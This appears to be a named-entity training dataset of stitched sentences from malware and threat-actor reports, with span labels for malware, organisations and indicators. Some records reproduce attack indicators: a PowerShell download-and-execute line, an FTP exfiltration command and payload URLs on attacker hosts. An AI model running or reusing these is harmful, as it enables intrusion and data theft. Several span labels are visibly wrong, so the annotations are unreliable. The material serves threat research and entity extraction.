{"text": "'' As was the case with HummingBad , the purpose of HummingWhale is to generate revenue by displaying fraudulent ads and automatically installing apps . These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures . Custom malware used by the group include : Two threat clusters used Mimikatz for dumping process memory .", "spans": [{"start": 24, "end": 34, "label": "Malware"}, {"start": 52, "end": 64, "label": "Malware"}, {"start": 235, "end": 270, "label": "Malware"}, {"start": 279, "end": 301, "label": "Malware"}, {"start": 428, "end": 436, "label": "System"}]}
{"text": "When users try to close the ads , the new functionality causes already downloaded apps to run in a virtual machine . Furthermore , like many other identified Lazarus Group families , these tools showcase the group 's creative solutions , such as the PapaAlfa , which makes it difficult to immediately identify potentially malicious activity on a compromised network . Notestuk ( Backdoor.Notestuk ) ( aka TURNEDUP ) : Malware that can be used to open a backdoor and gather information from a compromised computer . Healthcare has seen increasing email attacks from threat actors for a number of reasons .", "spans": [{"start": 158, "end": 171, "label": "Organization"}, {"start": 208, "end": 213, "label": "Organization"}, {"start": 250, "end": 258, "label": "System"}, {"start": 368, "end": 376, "label": "Malware"}, {"start": 379, "end": 396, "label": "Malware"}, {"start": 405, "end": 413, "label": "Malware"}, {"start": 515, "end": 525, "label": "Organization"}, {"start": 565, "end": 578, "label": "Organization"}]}
{"text": "That creates a fake ID that allows the perpetrators to generate referral revenues . The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine . Stonedrill ( Trojan.Stonedrill ) : Custom malware capable of opening a backdoor on an infected computer and downloading additional files . NoEscape is a new ransomware which been doing the rounds in underground forums since May 2023 .", "spans": [{"start": 126, "end": 132, "label": "System"}, {"start": 186, "end": 201, "label": "Malware"}, {"start": 227, "end": 237, "label": "Malware"}, {"start": 240, "end": 257, "label": "Malware"}, {"start": 366, "end": 374, "label": "Malware"}]}
{"text": "Use of the virtual machine brings many technical benefits to the operators , chief among them allowing the malware to install apps without requiring users to approve a list of elevated permissions . DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server . The malware also features a destructive component , which can wipe the master boot record of an infected computer . Beyond Ukraine , the group continues to sustain espionage operations that are global in scope and illustrative of the Russian military 's far - reaching ambitions and interests in other regions .", "spans": [{"start": 199, "end": 211, "label": "System"}, {"start": 313, "end": 334, "label": "Malware"}, {"start": 515, "end": 535, "label": "Organization"}]}
{"text": "Advertisement The VM also disguises the malicious activity , making it easier for the apps to infiltrate Google Play . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa . AutoIt backdoor : A custom built backdoor written in the AutoIt scripting language . Or , they may go up against groups whose ideologies do not align with their own .", "spans": [{"start": 105, "end": 116, "label": "System"}, {"start": 133, "end": 142, "label": "Malware"}, {"start": 155, "end": 163, "label": "System"}, {"start": 192, "end": 207, "label": "Malware"}, {"start": 305, "end": 356, "label": "Organization"}]}
{"text": "It has the added benefit of installing a nearly unlimited number of fraudulent apps without overloading the infected device . The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet . In addition to its custom malware , Elfin has also used a number of commodity malware tools , available for purchase on the cyber underground . In the sample analyzed , PIEHOP \u2019s entry point c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) calls PIEHOP \u2019s main function , supplying the argument .", "spans": [{"start": 130, "end": 136, "label": "Malware"}, {"start": 152, "end": 159, "label": "Organization"}, {"start": 291, "end": 332, "label": "Organization"}, {"start": 455, "end": 460, "label": "Organization"}, {"start": 588, "end": 722, "label": "Malware"}]}
{"text": "Until now , Android malware that wanted advanced capabilities typically had to trick users into approving sometimes scary-sounding permissions or exploit rooting vulnerabilities . Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable . These include : This article provides an overview of the Iranian cyber threat landscape , including the history of Iranian cyber strategy , the most recent news regarding its attack campaigns , and descriptions of major Iranian cyber threat groups .", "spans": [{"start": 12, "end": 19, "label": "System"}, {"start": 218, "end": 253, "label": "Malware"}, {"start": 388, "end": 395, "label": "Organization"}, {"start": 446, "end": 453, "label": "Organization"}, {"start": 506, "end": 522, "label": "Organization"}, {"start": 551, "end": 578, "label": "Organization"}]}
{"text": "Ginning the ratings FURTHER READING 1 million Google accounts compromised by Android malware called Gooligan To implement the VM feature , the malicious APK installation dropper used by HummingWhale uses DroidPlugin , an extension originally developed by developers from China-based company Qihoo 360 , Check Point said . This report will explore the various installers , uninstallers and loaders Novetta has observed the Lazarus Group using . Remcos ( Backdoor.Remvio ) : A commodity remote administration tool ( RAT ) that can be used to steal information from an infected computer . If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": [{"start": 46, "end": 52, "label": "Organization"}, {"start": 77, "end": 84, "label": "System"}, {"start": 100, "end": 108, "label": "Malware"}, {"start": 186, "end": 198, "label": "Malware"}, {"start": 204, "end": 215, "label": "Malware"}, {"start": 291, "end": 300, "label": "Organization"}, {"start": 303, "end": 314, "label": "Organization"}, {"start": 359, "end": 369, "label": "System"}, {"start": 372, "end": 384, "label": "System"}, {"start": 397, "end": 404, "label": "Organization"}, {"start": 422, "end": 435, "label": "Organization"}, {"start": 444, "end": 450, "label": "Malware"}, {"start": 453, "end": 468, "label": "Malware"}, {"start": 613, "end": 619, "label": "System"}]}
{"text": "HummingWhale has also been observed hiding the original malicious app once it 's installed and trying to improve its Google Play reputation by automatically generating posts disguised as positive user comments and ratings . This reverse engineering report looks at the RATs and staging malware found within the Lazarus Group 's collection . DarkComet ( Backdoor.Breut ) : Another commodity RAT used to open a backdoor on an infected computer and steal information . Lastly , the command supplies a file named \u201c s1.txt \u201d in the \" pack\\scil\\ \" folder of the attacker 's ISO .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 117, "end": 128, "label": "System"}, {"start": 269, "end": 273, "label": "System"}, {"start": 278, "end": 293, "label": "System"}, {"start": 311, "end": 324, "label": "Organization"}, {"start": 341, "end": 350, "label": "Malware"}, {"start": 353, "end": 367, "label": "Malware"}, {"start": 475, "end": 571, "label": "Malware"}]}
{"text": "Gooligan , a family of Android malware that came to light in November after it compromised more than 1 million Google accounts , contained similar abilities to tamper with Google Play ratings . Regardless of their sophistication or refinement , the malware families within the Lazarus Group 's India and Lima classes perform at a reasonable level for their designed purpose : the introduction and persistence of malware from the Lazarus Group on a victim 's infrastructure . Quasar RAT ( Trojan.Quasar ) : Commodity RAT that can be used to steal passwords and execute commands on an infected computer . The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 23, "end": 30, "label": "System"}, {"start": 111, "end": 117, "label": "Organization"}, {"start": 172, "end": 183, "label": "System"}, {"start": 277, "end": 290, "label": "Organization"}, {"start": 429, "end": 442, "label": "Organization"}, {"start": 475, "end": 485, "label": "Malware"}, {"start": 488, "end": 501, "label": "Malware"}, {"start": 611, "end": 618, "label": "Organization"}]}
{"text": "People who want to know if their Android devices are infected can download the Check Point app here . While the capabilities for the installers , loaders , and uninstallers in this report are relatively straight forward and single-focused , analysis of these malware families provide further insight into the capabilities of the Lazarus Group . Pupy RAT ( Backdoor.Patpoopy ) : Commodity RAT that can open a backdoor on an infected computer . None : While OT - oriented malware families can be purpose built for a particular target environment , malware that takes advantage of insecure by design OT protocols , such as LIGHTWORK \u2019s abuse of the IEC-104 protocol , can be modified and employed multiple times to target multiple victims .", "spans": [{"start": 33, "end": 40, "label": "System"}, {"start": 79, "end": 90, "label": "Organization"}, {"start": 133, "end": 143, "label": "System"}, {"start": 146, "end": 153, "label": "System"}, {"start": 160, "end": 172, "label": "System"}, {"start": 329, "end": 342, "label": "Organization"}, {"start": 345, "end": 353, "label": "Malware"}, {"start": 356, "end": 373, "label": "Malware"}, {"start": 450, "end": 486, "label": "Organization"}, {"start": 620, "end": 632, "label": "Malware"}, {"start": 646, "end": 662, "label": "Vulnerability"}]}
{"text": "A separate app from Check Point competitor Lookout also detects the threat as a variant of the Shedun malware family . The Lazarus Group employs a variety of RATs that operate in both client mode and server mode . NanoCore ( Trojan.Nancrat ) : Commodity RAT used to open a backdoor on an infected computer and steal information . Modules may be downloaded from a remote server or loaded from disk .", "spans": [{"start": 20, "end": 31, "label": "Organization"}, {"start": 43, "end": 50, "label": "Organization"}, {"start": 95, "end": 101, "label": "Malware"}, {"start": 123, "end": 136, "label": "Organization"}, {"start": 158, "end": 162, "label": "System"}, {"start": 214, "end": 222, "label": "Malware"}, {"start": 225, "end": 239, "label": "Malware"}, {"start": 330, "end": 398, "label": "Malware"}]}
{"text": "More technically inclined people can detect infections by seeing if a device connects to a control server located at app.blinkingcamera.com . The most common communication mode for a RAT is to act as a client to a remote server . NetWeird ( Trojan.Netweird.B ) : A commodity Trojan which can open a backdoor and steal information from the compromised computer . PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON \u201d or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": [{"start": 117, "end": 139, "label": "Indicator"}, {"start": 183, "end": 186, "label": "System"}, {"start": 230, "end": 238, "label": "Malware"}, {"start": 241, "end": 258, "label": "Malware"}, {"start": 275, "end": 281, "label": "Malware"}, {"start": 362, "end": 368, "label": "System"}, {"start": 378, "end": 387, "label": "System"}]}
{"text": "Package names for infected apps typically contain a common naming structure that includes com.XXXXXXXXX.camera , for example com.bird.sky.whale.camera ( app name : Whale Camera ) , com.color.rainbow.camera ( Rainbow Camera ) , and com.fishing.when.orangecamera ( Orange Camera ) . The Lazarus Group employs a variety of RATs and staging malware to conduct cyber operations , many of which contain significant code overlap that points to at least a shared development environment . It may also download additional potentially malicious files . The command and control ( C2 ) server must be configured from either the command line or a configuration file .", "spans": [{"start": 90, "end": 110, "label": "Indicator"}, {"start": 125, "end": 150, "label": "Indicator"}, {"start": 164, "end": 176, "label": "System"}, {"start": 181, "end": 205, "label": "Indicator"}, {"start": 208, "end": 222, "label": "System"}, {"start": 231, "end": 260, "label": "Indicator"}, {"start": 263, "end": 276, "label": "System"}, {"start": 285, "end": 298, "label": "Organization"}, {"start": 320, "end": 324, "label": "System"}, {"start": 329, "end": 344, "label": "System"}, {"start": 543, "end": 652, "label": "Malware"}]}
{"text": "Google officials removed the malicious apps from the Play market after receiving a private report of their existence . While some members within the Romeo and Sierra groups may not implement sound authentication strategies , shift their design focus in abrupt and unusual manners , and fail to understand the pitfalls of distributed command networks , on the whole the families within the Lazarus Group 's collection of RATs and staging malware perform their tasks with surprising effectiveness . Elfin also makes frequent use of a number of publicly available hacking tools , including : Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he \u2019d turned his considerable harassment skills squarely against the company .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 53, "end": 64, "label": "System"}, {"start": 149, "end": 154, "label": "Organization"}, {"start": 159, "end": 172, "label": "Organization"}, {"start": 389, "end": 402, "label": "Organization"}, {"start": 420, "end": 424, "label": "System"}, {"start": 429, "end": 444, "label": "System"}, {"start": 497, "end": 502, "label": "Organization"}, {"start": 589, "end": 602, "label": "Organization"}, {"start": 624, "end": 638, "label": "Organization"}]}
{"text": "A company representative declined to comment for this post . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations . LaZagne ( SecurityRisk.LaZagne ) : A login/password retrieval tool . Talos provided a highly informative article on the PREDATOR commercial spyware , which has been around since 2019 .", "spans": [{"start": 105, "end": 112, "label": "Organization"}, {"start": 190, "end": 203, "label": "Organization"}, {"start": 215, "end": 238, "label": "Organization"}, {"start": 241, "end": 248, "label": "Malware"}, {"start": 251, "end": 271, "label": "Malware"}, {"start": 310, "end": 315, "label": "Organization"}, {"start": 361, "end": 369, "label": "Malware"}]}
{"text": "BusyGasper \u2013 the unfriendly spy 29 AUG 2018 In early 2018 our mobile intruder-detection technology was triggered by a suspicious Android sample that , as it turned out , belonged to an unknown spyware family . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations . Mimikatz ( Hacktool.Mimikatz ) : Tool designed to steal credentials . Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY , we believe that the malware was possibly developed by either Rostelecom - Solar or an associated party to recreate real attack scenarios against energy grid assets .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 129, "end": 136, "label": "System"}, {"start": 254, "end": 261, "label": "Organization"}, {"start": 339, "end": 362, "label": "Organization"}, {"start": 365, "end": 373, "label": "Malware"}, {"start": 376, "end": 393, "label": "Malware"}, {"start": 525, "end": 537, "label": "Malware"}, {"start": 601, "end": 619, "label": "Organization"}]}
{"text": "Further investigation showed that the malware , which we named BusyGasper , is not all that sophisticated , but demonstrates some unusual features for this type of threat . McAfee Advanced Threat Research analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact . Gpppassword : Tool used to obtain and decrypt Group Policy Preferences ( GPP ) passwords . Data destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected .", "spans": [{"start": 63, "end": 73, "label": "Malware"}, {"start": 173, "end": 204, "label": "Organization"}, {"start": 300, "end": 316, "label": "Organization"}, {"start": 317, "end": 324, "label": "Organization"}, {"start": 335, "end": 356, "label": "System"}, {"start": 381, "end": 392, "label": "Malware"}, {"start": 472, "end": 488, "label": "Organization"}]}
{"text": "From a technical point of view , the sample is a unique spy implant with stand-out features such as device sensors listeners , including motion detectors that have been implemented with a degree of originality . McAfee Advanced Threat Research ( ATR ) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact . SniffPass ( SniffPass ) : Tool designed to steal passwords by sniffing network traffic . The practical relationship between security , risk , and decision making is well articulated by the US Department of Homeland Security as it is described as an approach for making security decisions .", "spans": [{"start": 212, "end": 243, "label": "Organization"}, {"start": 246, "end": 249, "label": "Organization"}, {"start": 347, "end": 363, "label": "Organization"}, {"start": 364, "end": 371, "label": "Organization"}, {"start": 382, "end": 403, "label": "System"}, {"start": 428, "end": 437, "label": "Malware"}, {"start": 440, "end": 449, "label": "Malware"}, {"start": 613, "end": 651, "label": "Organization"}]}
{"text": "It has an incredibly wide-ranging protocol \u2013 about 100 commands \u2013 and an ability to bypass the Doze battery saver . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents . In this section , we describe in detail an Elfin attack on a U.S. organization . Phishing attacks are more nuanced as they hinge on human error and prey on victims who may be busy , distracted or caught in an especially wellcrafted attack .", "spans": [{"start": 140, "end": 153, "label": "Organization"}, {"start": 224, "end": 238, "label": "Organization"}, {"start": 320, "end": 325, "label": "Organization"}, {"start": 409, "end": 420, "label": "Vulnerability"}, {"start": 433, "end": 515, "label": "Organization"}]}
{"text": "As a modern Android spyware it is also capable of exfiltrating data from messaging applications ( WhatsApp , Viber , Facebook ) . The use of decoy documents also reveals some of the potential targets of the Lazarus group 's malicious activity , specifically the use spear phishing attacks observed targeting South Korean government and aerospace organizations . On February 12 , 2018 at 16:45 ( all times are in the organization\u2019s local time ) , an email was sent to the organization advertising a job vacancy at an American global service provider . The collective \u2019s activity also supports domestic Russian promotion of support for the war .", "spans": [{"start": 98, "end": 106, "label": "System"}, {"start": 109, "end": 114, "label": "System"}, {"start": 117, "end": 125, "label": "System"}, {"start": 141, "end": 156, "label": "System"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 321, "end": 331, "label": "Organization"}, {"start": 336, "end": 359, "label": "Organization"}, {"start": 449, "end": 454, "label": "System"}]}
{"text": "Moreover , BusyGasper boasts some keylogging tools \u2013 the malware processes every user tap , gathering its coordinates and calculating characters by matching given values with hardcoded ones . The campaign lasted from April to October and used job descriptions relevant to target organizations , in both English and Korean language . The email contained a malicious link to http://mynetwork.ddns.net:880 . UNC1878 has used various offensive security tools , most commonly Cobalt Strike BEACON , along with legitimate tools and built - in commands such as PSEXEC , WMI , and BITSadmin .", "spans": [{"start": 11, "end": 21, "label": "Malware"}, {"start": 337, "end": 342, "label": "System"}, {"start": 373, "end": 402, "label": "Indicator"}, {"start": 405, "end": 412, "label": "Organization"}, {"start": 471, "end": 491, "label": "System"}, {"start": 554, "end": 560, "label": "System"}, {"start": 563, "end": 566, "label": "System"}, {"start": 573, "end": 582, "label": "System"}]}
{"text": "The sample has a multicomponent structure and can download a payload or updates from its C & C server , which happens to be an FTP server belonging to the free Russian web hosting service Ucoz . The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money . The recipient clicked the link and proceeded to download and open a malicious HTML executable file , which in turn loaded content from a C&C server via an embedded iframe . The malware also contains a new component called Tonnerre French for thunder a secondstage payload used for persistence , surveillance , and data exfiltration .", "spans": [{"start": 199, "end": 212, "label": "Organization"}, {"start": 508, "end": 515, "label": "Malware"}, {"start": 553, "end": 561, "label": "Malware"}, {"start": 583, "end": 602, "label": "Malware"}]}
{"text": "It is noteworthy that BusyGasper supports the IRC protocol which is rarely seen among Android malware . In this latest discovery by McAfee , despite a short pause in similar operations , the Lazarus group targets financial organizations . At the same time , code embedded within this file also executed a powershell command to download and execute a copy of chfeeds.vbe from the C&C server . [System.Net.ServicePointManager] : :S erverCertificateValidationCallback={$true};IEX (New-Object Net.WebClient ) .DownloadString ( ' https://217.147.168.46:8088/index.jpg ' ) . Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": [{"start": 22, "end": 32, "label": "Malware"}, {"start": 86, "end": 93, "label": "System"}, {"start": 132, "end": 138, "label": "Organization"}, {"start": 191, "end": 204, "label": "Organization"}, {"start": 213, "end": 236, "label": "Organization"}, {"start": 305, "end": 315, "label": "System"}, {"start": 358, "end": 369, "label": "Indicator"}, {"start": 379, "end": 389, "label": "System"}, {"start": 525, "end": 562, "label": "Indicator"}, {"start": 615, "end": 622, "label": "Organization"}, {"start": 646, "end": 667, "label": "Organization"}, {"start": 682, "end": 695, "label": "System"}, {"start": 739, "end": 759, "label": "Organization"}]}
{"text": "In addition , the malware can log in to the attacker \u2019 s email inbox , parse emails in a special folder for commands and save any payloads to a device from email attachments . This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans . A second JavaScript command was also executed , which created a scheduled task to execute chfeeds.vbe multiple times a day . Mandiant has previously identified the domain wasxxv[.]site being used by North Korean threat actors .", "spans": [{"start": 205, "end": 216, "label": "Malware"}, {"start": 386, "end": 397, "label": "Indicator"}, {"start": 456, "end": 491, "label": "Indicator"}, {"start": 495, "end": 521, "label": "Organization"}]}
{"text": "This particular operation has been active since approximately May 2016 up to the present time . This Malware Analysis Report ( MAR ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) . The chfeeds.vbe file acts as a downloader and was used to download a second powershell script ( registry.ps1 ) . They would then initiate communication with additional C2 infrastructure to execute obfuscated PowerShell scripts .", "spans": [{"start": 179, "end": 210, "label": "Organization"}, {"start": 213, "end": 216, "label": "Organization"}, {"start": 261, "end": 264, "label": "Organization"}, {"start": 273, "end": 284, "label": "Indicator"}, {"start": 345, "end": 355, "label": "System"}, {"start": 365, "end": 377, "label": "Indicator"}]}
{"text": "Infection vector and victims While looking for the infection vector , we found no evidence of spear phishing or any of the other common vectors . When victims open malicious documents attached to the emails , the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering . This script in turn downloaded and executed a PowerShell backdoor known as POSHC2 , a proxy-aware C&C framework , from the C&C server ( https:// host-manager.hopto.org ) . But after being informed that Bradshaw was not subject to Canadian trademark laws , Avid Life offered to buy AshleyMadisonSucks.com for $ 10,000 .", "spans": [{"start": 357, "end": 376, "label": "Malware"}, {"start": 386, "end": 392, "label": "Malware"}, {"start": 397, "end": 422, "label": "System"}, {"start": 447, "end": 478, "label": "Indicator"}, {"start": 513, "end": 521, "label": "Organization"}, {"start": 567, "end": 576, "label": "Organization"}, {"start": 592, "end": 614, "label": "Organization"}]}
{"text": "But some clues , such as the existence of a hidden menu for operator control , point to a manual installation method \u2013 the attackers used physical access to a victim \u2019 s device to install the malware . According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries . Later at 20:57 , the attackers became active on the compromised machine and proceeded to download the archiving tool WinRAR . 89.34.237.118 808 http://89.34.237.118:808/Rar32.exe . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": [{"start": 247, "end": 266, "label": "Organization"}, {"start": 290, "end": 307, "label": "System"}, {"start": 333, "end": 342, "label": "Organization"}, {"start": 345, "end": 363, "label": "Organization"}, {"start": 370, "end": 388, "label": "Organization"}, {"start": 508, "end": 514, "label": "System"}, {"start": 517, "end": 534, "label": "Indicator"}, {"start": 535, "end": 569, "label": "Indicator"}, {"start": 664, "end": 698, "label": "Malware"}]}
{"text": "This would explain the number of victims \u2013 there are less than 10 of them and according to our detection statistics , they are all located in the Russia . The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies . At 23:29 , the attackers then proceeded to deploy an updated version of their POSHC2 stager . 192.119.15.35 880 http://mynetwork.ddns.net:880/st-36-p4578.ps1 . The group 's long - standing center focus has been Ukraine , where it has carried out a campaign of disruptive and destructive attacks over the past decade using wiper malware , including during Russia 's re - invasion in 2022 .", "spans": [{"start": 189, "end": 192, "label": "System"}, {"start": 225, "end": 231, "label": "Organization"}, {"start": 402, "end": 408, "label": "Malware"}, {"start": 418, "end": 435, "label": "Indicator"}, {"start": 436, "end": 481, "label": "Indicator"}, {"start": 535, "end": 542, "label": "Organization"}, {"start": 572, "end": 594, "label": "Organization"}, {"start": 599, "end": 618, "label": "Organization"}, {"start": 646, "end": 659, "label": "Malware"}]}
{"text": "Intrigued , we continued our search and found more interesting clues that could reveal some detailed information about the owners of the infected devices . FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors . This tool was downloaded several times between 23:29 on February 12 and 07:47 on February 13 . In October 2019 , ESET published \u201c Operation Ghost \u201d detailing a set of new trojans used by the Dukes , including PolyglotDuke , RegDuke and FatDuke .", "spans": [{"start": 156, "end": 165, "label": "System"}, {"start": 176, "end": 192, "label": "Malware"}, {"start": 220, "end": 240, "label": "System"}, {"start": 321, "end": 340, "label": "Organization"}, {"start": 456, "end": 460, "label": "Organization"}, {"start": 473, "end": 488, "label": "Organization"}, {"start": 534, "end": 539, "label": "Organization"}, {"start": 552, "end": 564, "label": "Malware"}, {"start": 567, "end": 574, "label": "Malware"}, {"start": 579, "end": 586, "label": "Malware"}]}
{"text": "Several TXT files with commands on the attacker \u2019 s FTP server contain a victim identifier in the names that was probably added by the criminals : CMDS10114-Sun1.txt CMDS10134-Ju_ASUS.txt CMDS10134-Tad.txt CMDS10166-Jana.txt CMDS10187-Sun2.txt CMDS10194-SlavaAl.txt CMDS10209-Nikusha.txt Some of them sound like Russian names : Jana , SlavaAl , Nikusha . HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware to establish persistence . Two days later , on February 14 at 15:12 , the attackers returned and installed Quasar RAT onto the infected computer that communicated with a C&C server ( 217.147.168.123 ) . Have you ever been targeted by a social engineering attack Was it through email or", "spans": [{"start": 147, "end": 165, "label": "Indicator"}, {"start": 166, "end": 187, "label": "Indicator"}, {"start": 188, "end": 205, "label": "Indicator"}, {"start": 206, "end": 224, "label": "Indicator"}, {"start": 225, "end": 243, "label": "Indicator"}, {"start": 244, "end": 265, "label": "Indicator"}, {"start": 266, "end": 287, "label": "Indicator"}, {"start": 355, "end": 374, "label": "Organization"}, {"start": 382, "end": 395, "label": "System"}, {"start": 399, "end": 406, "label": "System"}, {"start": 422, "end": 439, "label": "System"}, {"start": 547, "end": 557, "label": "Malware"}, {"start": 623, "end": 638, "label": "Indicator"}]}
{"text": "As we know from the FTP dump analysis , there was a firmware component from ASUS firmware , indicating the attacker \u2019 s interest in ASUS devices , which explains the victim file name that mentions \u201c ASUS \u201d . HIDDEN COBRA actors install the FALLCHILL malware to establish persistence . Quasar RAT was installed to CSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe . Sometimes this was a high profile , legitimate site such as \u2018 diplomacy.pl \u2019 hosting a ZIP archive .", "spans": [{"start": 76, "end": 80, "label": "Organization"}, {"start": 132, "end": 136, "label": "Organization"}, {"start": 208, "end": 227, "label": "Organization"}, {"start": 240, "end": 257, "label": "System"}, {"start": 285, "end": 295, "label": "Malware"}, {"start": 313, "end": 368, "label": "Indicator"}, {"start": 392, "end": 469, "label": "Indicator"}]}
{"text": "Information gathered from the email account provides a lot of the victims \u2019 personal data , including messages from IM applications . Working with U.S. government partners , DHS and FBI identified Internet Protocol ( IP ) addresses and other indicators of compromise ( IOCs ) associated with a remote administration tool ( RAT ) used by the North Korean government\u2014commonly known as FALLCHILL . At this point , the attackers ceased activity while maintaining access to the network until February 21 . We have observed CADDYWIPER deployed across several verticals in Ukraine , including the government and financial sectors , throughout Russia \u2019s invasion of Ukraine .", "spans": [{"start": 152, "end": 162, "label": "Organization"}, {"start": 174, "end": 177, "label": "Organization"}, {"start": 182, "end": 185, "label": "Organization"}, {"start": 294, "end": 320, "label": "System"}, {"start": 323, "end": 326, "label": "System"}, {"start": 383, "end": 392, "label": "System"}, {"start": 518, "end": 528, "label": "System"}, {"start": 590, "end": 600, "label": "Organization"}, {"start": 605, "end": 622, "label": "Organization"}, {"start": 636, "end": 667, "label": "Organization"}]}
{"text": "Gathered file Type Description lock Text Implant log ldata sqlite3 Location data based on network ( cell_id ) gdata sqlite3 Location data based on GPS coordinates sdata sqlite3 SMS messages f.db sqlite3 Facebook messages v.db sqlite3 Viber messages w.db sqlite3 WhatsApp messages Among the other data gathered were SMS banking messages that revealed an account with a balance of more than US $ 10,000.But as far as we know , the attacker behind this campaign is not interested in stealing the victims \u2019 money This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . At 06:38 , the attackers were observed downloading a custom .NET FTP tool to the infected computer . 192.119.15.36 880 http://192.119.15.36:880/ftp.exe . Cybersecurity researchers recently uncovered a phishing campaign , dubbed BadBlood , aimed at 25 senior professionals specializing in genetic , neurology , and oncology research in the U.S. and Israel .", "spans": [{"start": 163, "end": 176, "label": "Indicator"}, {"start": 190, "end": 202, "label": "Indicator"}, {"start": 203, "end": 211, "label": "System"}, {"start": 221, "end": 233, "label": "Indicator"}, {"start": 234, "end": 239, "label": "System"}, {"start": 249, "end": 261, "label": "Indicator"}, {"start": 262, "end": 270, "label": "System"}, {"start": 523, "end": 532, "label": "Malware"}, {"start": 541, "end": 553, "label": "Organization"}, {"start": 576, "end": 585, "label": "System"}, {"start": 648, "end": 656, "label": "Malware"}, {"start": 689, "end": 706, "label": "Indicator"}, {"start": 707, "end": 739, "label": "Indicator"}, {"start": 742, "end": 767, "label": "Organization"}, {"start": 789, "end": 806, "label": "Organization"}, {"start": 816, "end": 824, "label": "Organization"}, {"start": 836, "end": 919, "label": "Organization"}]}
{"text": ". McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications . Later at 6:56 , the attackers exfiltrated data using this FTP tool to a remote host: JsuObf.exe Nup#Tntcommand -s CSIDL_PROFILE\\appdata\\roaming\\adobe\\rar -a ftp://89.34.237.118:2020 -f/[REDACTED]-u[REDACTED]-p[REDACTED] . Between Jan. 1 \u2013 June 20 , 2023 , Mandiant identified more than 500 distinct victims that the KillNet collective has allegedly targeted with DDoS attacks .", "spans": [{"start": 2, "end": 33, "label": "Organization"}, {"start": 145, "end": 168, "label": "Organization"}, {"start": 171, "end": 184, "label": "Organization"}, {"start": 187, "end": 194, "label": "Organization"}, {"start": 197, "end": 208, "label": "Organization"}, {"start": 215, "end": 233, "label": "Organization"}, {"start": 294, "end": 297, "label": "System"}, {"start": 321, "end": 331, "label": "Indicator"}, {"start": 512, "end": 613, "label": "Indicator"}]}
{"text": "We found no similarities to commercial spyware products or to other known spyware variants , which suggests BusyGasper is self-developed and used by a single threat actor . Because of this , additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL . Activity ceased until the attackers returned on March 5 and were observed using Quasar RAT to download a second custom AutoIt FTP Exfiltration tool known as FastUploader from http://192.119.15.36:880/ftp.exe . Techniques include reading SAM and LSA secrets from registries , dumping NTLM hashes , plaintext credentials , and Kerberos keys , as well as dumping the NTDS.dit Active Directory database .", "spans": [{"start": 108, "end": 118, "label": "Malware"}, {"start": 202, "end": 222, "label": "System"}, {"start": 266, "end": 275, "label": "System"}, {"start": 358, "end": 368, "label": "Malware"}, {"start": 397, "end": 407, "label": "Malware"}, {"start": 435, "end": 447, "label": "Malware"}, {"start": 453, "end": 485, "label": "Indicator"}]}
{"text": "At the same time , the lack of encryption , use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware . This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA . This tool was then installed to csidl_profile\\appdata\\roaming\\adobe\\ftp.exe . Adversaries may manipulate physical process control within the industrial environment .", "spans": [{"start": 305, "end": 316, "label": "Organization"}, {"start": 317, "end": 329, "label": "Organization"}, {"start": 364, "end": 407, "label": "Indicator"}]}
